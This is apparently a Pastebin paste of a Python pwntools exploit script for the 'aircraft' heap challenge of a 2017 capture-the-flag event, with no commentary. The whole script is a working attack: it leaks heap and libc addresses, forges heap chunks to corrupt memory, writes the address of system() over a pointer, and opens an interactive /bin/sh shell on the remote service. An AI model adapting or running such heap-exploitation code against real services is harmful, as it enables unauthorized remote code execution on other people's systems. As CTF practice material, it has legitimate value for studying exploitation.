Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # -*- coding: utf-8 -*-
- from pwn import *
- host = "aircraft.2017.teamrois.cn"
- port = 9731
- r = remote(host,port)
- def buy(name,idx):
- r.recvuntil(":")
- r.sendline("1")
- r.recvuntil(":")
- r.sendline(str(idx))
- r.recvuntil(":")
- r.sendline(name)
- def build(name,size):
- r.recvuntil(":")
- r.sendline("2")
- r.recvuntil("?")
- r.sendline(str(size))
- r.recvuntil(":")
- r.sendline(name)
- def enterair(idx):
- r.recvuntil(":")
- r.sendline("3")
- r.recvuntil("?")
- r.sendline(str(idx))
- def selair(idx):
- enterair(idx)
- r.recvuntil("Your choice:")
- r.sendline("2")
- def listplant(idx):
- enterair(idx)
- r.recvuntil(":")
- r.sendline("1")
- def selectpla(name):
- r.recvuntil(":")
- r.sendline("4")
- r.recvuntil("?")
- r.sendline(name)
- def selplant(name):
- selectpla(name)
- r.recvuntil(":")
- r.sendline("2")
- def fly(name,idx):
- selectpla(name)
- r.recvuntil(":")
- r.sendline("1")
- r.recvuntil("?")
- r.sendline(str(idx))
- def ret():
- r.recvuntil("Your choice:")
- r.sendline("3")
- buy("a"*0x18,1)
- build("orange",0x30)
- build("meh",0x80)
- buy("ddaa",13)
- fly("ddaa",0)
- ret()
- listplant(0)
- r.recvuntil("Build by ")
- data = r.recvuntil("\n")[:-1]
- heap = u64(data.ljust(8,"\x00")) - 0xf0
- print "heap:",hex(heap)
- ret()
- selplant("ddaa")
- build("b"*0x20 + p64(heap+0x130) + p64(heap+0x30) + p64(heap+0x10) ,0x48)
- buy("1337",1)
- selair(1)
- listplant(0)
- r.recvuntil("Build by ")
- data = r.recvuntil("\n")[:-1]
- libc = u64(data.ljust(8,"\x00")) - 0x3c3b78
- print "libc:",hex(libc)
- ret()
- build("fish",0x30) #3
- buy("lays",0)
- fly("lays",3)
- selplant("lays")
- free_chunk = libc + 0x3c3b40
- build("c"*0x30 + p64(free_chunk-0x38) + p64(heap) ,0x48)
- selair(3)
- r.recvuntil(":")
- buy("lays",0)
- system = libc+ 0x45390
- build("/bin/sh".ljust(0x20,"\x00") + p64(heap+0x130) + p64(heap+240) + p64(heap+0x10) + p64(0) + p64(system)[:7] ,0x48)
- selplant("/bin/sh")
- r.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement